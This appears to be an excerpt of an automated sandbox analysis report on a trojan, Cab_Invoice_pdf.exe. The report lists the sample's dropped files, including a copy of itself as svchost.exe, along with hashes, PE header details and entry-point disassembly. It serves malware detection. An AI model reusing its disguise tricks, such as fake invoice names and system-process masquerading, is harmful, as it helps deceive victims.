                          SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                          MD5:AC290DAD7CB4CA2D93516580452EDA1C
                          SHA1:FA949453557D0049D723F9615E4F390010520EDA
                          SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                          SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-filesystem-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.085387497246545
                          Encrypted:false
                          SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                          MD5:AEC2268601470050E62CB8066DD41A59
                          SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                          SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                          SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-heap-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.060393359865728
                          Encrypted:false
                          SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                          MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                          SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                          SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                          SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-locale-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.13172731865352
                          Encrypted:false
                          SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                          MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                          SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                          SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                          SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-math-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):28984
                          Entropy (8bit):6.6686462438397
                          Encrypted:false
                          SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                          MD5:8B0BA750E7B15300482CE6C961A932F0
                          SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                          SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                          SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-process-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.076072254895036
                          Encrypted:false
                          SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                          MD5:8D02DD4C29BD490E672D271700511371
                          SHA1:F3035A756E2E963764912C6B432E74615AE07011
                          SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                          SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-runtime-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22840
                          Entropy (8bit):6.942029615075195
                          Encrypted:false
                          SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                          MD5:41A348F9BEDC8681FB30FA78E45EDB24
                          SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                          SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                          SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-stdio-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24368
                          Entropy (8bit):6.873960147000383
                          Encrypted:false
                          SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                          MD5:FEFB98394CB9EF4368DA798DEAB00E21
                          SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                          SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                          SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-string-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):23488
                          Entropy (8bit):6.840671293766487
                          Encrypted:false
                          SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                          MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                          SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                          SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                          SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-time-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.018061005886957
                          Encrypted:false
                          SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                          MD5:849F2C3EBF1FCBA33D16153692D5810F
                          SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                          SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                          SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-utility-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.127951145819804
                          Encrypted:false
                          SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                          MD5:B52A0CA52C9C207874639B62B6082242
                          SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                          SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                          SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:Zip archive data, at least v2.0 to extract
                          Category:dropped
                          Size (bytes):788326
                          Entropy (8bit):5.450096772437984
                          Encrypted:false
                          SSDEEP:12288:hE7Qf7ul3vNuOn9/eV8h9+fsEaD1VykmrMbbcor:i7Qf7AvT/eV8h9+fsEaxdbbdr
                          MD5:8EB57166E2699F02C4BC8BE1383F283D
                          SHA1:1B89862749423F4A683B4DA2ADE4610CCD715E92
                          SHA-256:9F7818513C4A3D482539D83B0F5669D1C92D0E4DE707F028152EF2DC1F071F0E
                          SHA-512:259E001ED7417CFCAC6F8428422048CEB13ED2F814C27345EC55BF619E11F02D6464EFE30445AA6D3FD827582E8E1932DF4F59C9AAC6B0C6E77CB6102CC39607
                          Malicious:false
                          Reputation:unknown
                          Preview: PK..........!...^D............_bootlocale.pycU............e.....................@...sz...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.).z.A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C...s....t.j.j.r.d.S.t.....d...S.).N..UTF-8.....)...sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r.....Lc:\users\ieuser\appdata\local\programs\python\python38-32\lib\_bootlocale.py..getpreferredencoding....s..........r......getandroidapilevelc....................C...s....d.S.).Nr....r....r....r....r....r....r........s......c....................C...s....t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r....).r....r....r......localer....).r....r....r....r....r....r........s............c....................C...s6...|.r.t...t.j.j
                          C:\Users\user\AppData\Local\Temp\_MEI63082\file.exe.manifest
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1490
                          Entropy (8bit):5.276963138578381
                          Encrypted:false
                          SSDEEP:24:2dt4+iNKg9mMPgi0iiNK+bkgxIme7cb3jgMkb4+GE:cSFKgYSEK+bkgxImeMcn3GE
                          MD5:0AA1B4EF7F524C59405E0F7B3F004920
                          SHA1:24B2A847CC79132566696803636E53CC9D87D79D
                          SHA-256:6F78C922ADC11D653C278685025181E37EE7976C5A57DF34EC297166A82F016D
                          SHA-512:26924E70A196FA455C68BE1DCFEEEC1F507A04BE79DE57A55523939C49F106A46194A379109B9348FF009CF5BBB7B676206FB14BBDFC82DFFD67EC2E77309214
                          Malicious:false
                          Reputation:unknown
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity type="win32" name="file" processorArchitecture="x86" version="1.0.0.0"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" language="*" processorArchitecture="*" version="6.0.0.0" publicKeyToken="6595b64144ccf1df"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440
                          C:\Users\user\AppData\Local\Temp\_MEI63082\libcrypto-1_1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):2234560
                          Entropy (8bit):6.107082014192982
                          Encrypted:false
                          SSDEEP:49152:mIvPtO+ejtvRMO8xxZv1CPwDv3uFfJhFcl:xvPtwjnMO8HZv1CPwDv3uFfJh6
                          MD5:76DA35FDE4E3E110331612AB351A811C
                          SHA1:1836517441C70848DB3F5D4EF4EA0CB2E330732A
                          SHA-256:ECABC901FA89CD771405C004849384A5148644C273A88048AE16C86BD14EF4DD
                          SHA-512:A43DAE59C7D71E38F6365413946EE740C643299403DFE531D0CDBD561623807784830124B786422799AE45852F5AA541B5A94FA8E0947850547E2446BA99BC30
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\libffi-7.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):29208
                          Entropy (8bit):6.643623418348
                          Encrypted:false
                          SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                          MD5:BC20614744EBF4C2B8ACD28D1FE54174
                          SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                          SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                          SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\libssl-1_1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):538304
                          Entropy (8bit):5.760022892820208
                          Encrypted:false
                          SSDEEP:12288:AqejFQiEYXBYYu3yzOBC4ISRpQuU2lvz/c:xaFJ5zF41TQuU2lvz/c
                          MD5:0E15ACB04CFABDE2A6493FAA49E74280
                          SHA1:E8EAC74A6DA0F1E78C66F84C14CF92DF18CC7E8A
                          SHA-256:A59EC84F8AE6F0174D5C1CE3ABC22B0FDCED6B50F7C8B689367AC859AC9E08E7
                          SHA-512:12D24D5FD42829FD0F89A1E42F46CD498D71E441EC803161319E721A3280406589B540EC949BBB6C0AF661CE806BA50A1097B7793C9A1CCC83061DEC4FC753AD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\pyexpat.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):168624
                          Entropy (8bit):6.629244601257658
                          Encrypted:false
                          SSDEEP:3072:ZhgFHiME7l8Z5bYwLoE8KZKGjUdGjN81IuBhh7Eu0:QFHc7l8ZORKZKGjtjN8E
                          MD5:6E2329BA53FF8B6E2E4069A859EE3FCE
                          SHA1:1C067F16A3069A44EDF7A073FA35B70B86F99405
                          SHA-256:27363A2DCDD990DEF43307B1644DC03304F9478830C8989C49F9DA2491889E6E
                          SHA-512:C0FCC4F0AE5C019ADAE3593F81BA26CA8C5CF6A7C15B78FD42B052DBDA6CBDEFDC6F8FA52C3FD614F1B17F48725D58CA23972C8B7C183EAFC0D542251A9EF23D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\python38.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):4052656
                          Entropy (8bit):6.720992659261596
                          Encrypted:false
                          SSDEEP:49152:NgQmEhbJSgm06kaUr9Alta2tPfx1CI8jXHB7MZnCPYJAT37PtLKK4WoooOA:iEWg5uta2/8LHxMZBJ4lKKoooOA
                          MD5:7B97AB4F12ED448B26669B83F9061BEF
                          SHA1:0E2516F3DC50EFB7FAA0B276830B4F95D8084772
                          SHA-256:E7312737C82CC967FB669AE4C2736CB005F4192E1654C717DBDC5986E562957B
                          SHA-512:4F123981982EA4AFFE230CBDCDBEC9DE419D4F3D92C026B2DF3DA7D2BE9BEFAAB707167265CFC97FF183F13A60BE6C53FB541E00F518BEACE819B8B9B4927D8A
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\pywintypes38.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):115712
                          Entropy (8bit):6.533866514211769
                          Encrypted:false
                          SSDEEP:3072:QCf+6EE1b22/q4+ldC56PsZyLY7b00nPO4KMGSncyl8ZpFI:h+xE1iz4+ldC5msYLY7b00PO4KMGScyW
                          MD5:3206CF4CD05B9E993A822C0DAC05B1D0
                          SHA1:F49E809FB19BC1E24F1A7904663375554BD4D5CD
                          SHA-256:9A3B70353BB9346BF1ECD2784164FEAF6DBC9CB969298091F549EF8269AEF930
                          SHA-512:A6A4AA66E264E2438DF573D31DA0827650F48F4877ECABF391D284C99019E041F3333A708E2657FFC565B0CB9933D9C7A77B3726B8F4EC0DDA5DA3C5E8AB68C0
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\select.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24752
                          Entropy (8bit):6.44568082211825
                          Encrypted:false
                          SSDEEP:384:Tg7oA2vjUzNJmTgj0nq1RiPFdd+k1IumGEKDG4y8cLrhX:ccnvjANJiXnqSdWk1IumGEKDG4yLrhX
                          MD5:404C4F2FF59DA1993518D39754376606
                          SHA1:560A0F8A301EF5FEF541C6CE64975E3AA1AD1460
                          SHA-256:BB4FE62B14AD6FC559A1D88339D0F302450DAFEC09CF6027069F66B6D5BEF1AB
                          SHA-512:585ECF2B3DA37F1144191A70CA7C29151DE3C6BC1943719318BC291B29A08BB7E4A8C6200F8C743DF8BD32225221CADEB8306450B7E491B9B16AA94587711169
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\ucrtbase.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1142072
                          Entropy (8bit):6.809041027525523
                          Encrypted:false
                          SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                          MD5:D6326267AE77655F312D2287903DB4D3
                          SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                          SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                          SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\unicodedata.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1091248
                          Entropy (8bit):5.360848319038452
                          Encrypted:false
                          SSDEEP:12288:gJz3Q191SnFRHotduNpqQOZ6gBjCmN/X4GyCAx9++bBlhJk93cgewrxEekMGv:gJ3KSogG7hCc/4D9nbDhG2wr0MGv
                          MD5:5FB1A0234305D5B69DB79B4F7F89EBCA
                          SHA1:9A6EF3DD3A024B433566AC20146344A1F0631F9B
                          SHA-256:D9AF40281331CF55E21E20A57342FE86C6C729906D6A3AF3F3F3AD00F2284ABE
                          SHA-512:FE52C0AE494459B8D015E2E28AF92BDCF6A491DC424D803B3E87E21612C4654136335E5399F5CA0FEF4717EECE75D53AC11050623E109E4F7ED59392D74A9085
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\win32api.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):104960
                          Entropy (8bit):6.460606710335285
                          Encrypted:false
                          SSDEEP:3072:KloBRQj7JH+VldRcmShLAG9wRcM7RSuQrbCQGt5Ne/eo:KloBa4ncmhWKUu/7t5Nen
                          MD5:2866BF1A085564A0F63B76173943BA64
                          SHA1:CAF810657651B1EC3F667A671E8F9307EEEA98B7
                          SHA-256:3021294B610E01ABD37289DDBE2BF0507E7DE3FCB678E07525EC4E0892747955
                          SHA-512:D1090831BA6D06C09F1DFE2790B435020854E328F9826937244C13CDDB1080CAB35F3679AB34EB44D88F9BECF4CCF933CD2EBE1B5CC853758BFA9BC04B002068
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\win32event.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22016
                          Entropy (8bit):5.972372003642818
                          Encrypted:false
                          SSDEEP:384:AkUKkjmkLfkoke6am07BxEjr6p+zDLIkOn/T7AdlF7EpmkteAi5tjVUjaPGaCG:A3KwmwfzkAHUr6uQkG/T7AdlF7Epmktl
                          MD5:29EC0D47B88A465F69B5E18A3D35E1D0
                          SHA1:91739F4227A6DFA4F1F107DD19D01B9E2C90C177
                          SHA-256:9BA207206559F40D534100DF3C847E2A67D8008A8EE98E991D5CD6B0813B8624
                          SHA-512:552F4C4892C453B64CE84D8DBEB9B15E3506A0666867AF5CFB28C6B167E2C81F8EED0A8598DEEBB38C90D0B2CCBEC69223C2D487256541D041D85B2F0FDC871D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\win32gui.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):176128
                          Entropy (8bit):6.424412252153223
                          Encrypted:false
                          SSDEEP:3072:uVvRKIA/oqLcDwPY5Fej7oLyqx9NkdMiCawrLwCNzR0jzlZ+6KLDtW8d7U:6RNA/oqLcDwPY5FeCNkdMiCasvRIK6KE
                          MD5:844D345409407D3C470219342EFBD80C
                          SHA1:70612D8676009CC780ABE61583996473F027334A
                          SHA-256:42898717D0D574B6C4BEAD3C07A67368FCBFC49F498997A3A08E24612F4EF365
                          SHA-512:8A54414DA2D72331441AE5F47690F91C676ED6CD2B96B57AAE783774E5A1FE03F225DDD1DFDAE77E93897E3AE3DA7609A99448184C6BB1D92D3D600BAD17D7A4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Roaming\svchost.exe
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):7399848
                          Entropy (8bit):7.994931693267312
                          Encrypted:true
                          SSDEEP:196608:ACUMtXu1qryKbnaqp0VG1p/kuszht6NZq:+Mte1UyKbnaW0M1VMQ
                          MD5:E5DC6A7459FD6EF46AFEE60318470B03
                          SHA1:C0A036DEF9B2D42804C164B156AAF007D9FFFA02
                          SHA-256:EA0FD73223E8313DA714A6924C1DFAE72F2C976935C2B323A6B192C063B0063A
                          SHA-512:3BB89920AB154111875279E57624436258A8ECC65B627FCB06445D868A9239EEA862B1BD7E7992BE861AF18C629262B323112AA056544F28885343B1C051803A
                          Malicious:true
                          Reputation:unknown
                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Process:C:\Windows\System32\svchost.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):55
                          Entropy (8bit):4.306461250274409
                          Encrypted:false
                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                          Malicious:false
                          Reputation:unknown
                          Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.994931693267312
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Cab_Invoice_pdf.exe
                          File size:7399848
                          MD5:e5dc6a7459fd6ef46afee60318470b03
                          SHA1:c0a036def9b2d42804c164b156aaf007d9fffa02
                          SHA256:ea0fd73223e8313da714a6924c1dfae72f2c976935c2b323a6b192c063b0063a
                          SHA512:3bb89920ab154111875279e57624436258a8ecc65b627fcb06445d868a9239eea862b1bd7e7992be861af18c629262b323112aa056544f28885343b1c051803a
                          SSDEEP:196608:ACUMtXu1qryKbnaqp0VG1p/kuszht6NZq:+Mte1UyKbnaW0M1VMQ
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}...}...}.....@.q.....B.......C.e....5v.~...F...o...F...`...F...o....jz.t...}...........m.....N.|.......|...Rich}..........

                          File Icon

                          Icon Hash:e0c88898988884bc

                          Static PE Info

                          General

                          Entrypoint:0x407ad3
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x5FFEC18A [Wed Jan 13 09:46:50 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:4f699d9195f8b90fd792f147d3831279

                          Entrypoint Preview

                          Instruction
                          call 00007F2AF83A103Eh
                          jmp 00007F2AF83A09B3h
                          int3
                          int3
                          int3
                          push edi
                          push esi
                          push ebx
                          xor edi, edi
                          mov eax, dword ptr [esp+14h]
                          or eax, eax
                          jnl 00007F2AF83A0B36h
                          inc edi
                          mov edx, dword ptr [esp+10h]
                          neg eax
                          neg edx
                          sbb eax, 00000000h
                          mov dword ptr [esp+14h], eax
                          mov dword ptr [esp+10h], edx
                          mov eax, dword ptr [esp+1Ch]
                          or eax, eax
                          jnl 00007F2AF83A0B36h
                          inc edi
                          mov edx, dword ptr [esp+18h]
                          neg eax
                          neg edx
                          sbb eax, 00000000h
                          mov dword ptr [esp+1Ch], eax
                          mov dword ptr [esp+18h], edx
                          or eax, eax
                          jne 00007F2AF83A0B3Ah
                          mov ecx, dword ptr [esp+18h]
                          mov eax, dword ptr [esp+14h]
                          xor edx, edx
                          div ecx
                          mov ebx, eax
                          mov eax, dword ptr [esp+10h]
                          div ecx
                          mov edx, ebx
                          jmp 00007F2AF83A0B63h
                          mov ebx, eax
                          mov ecx, dword ptr [esp+18h]
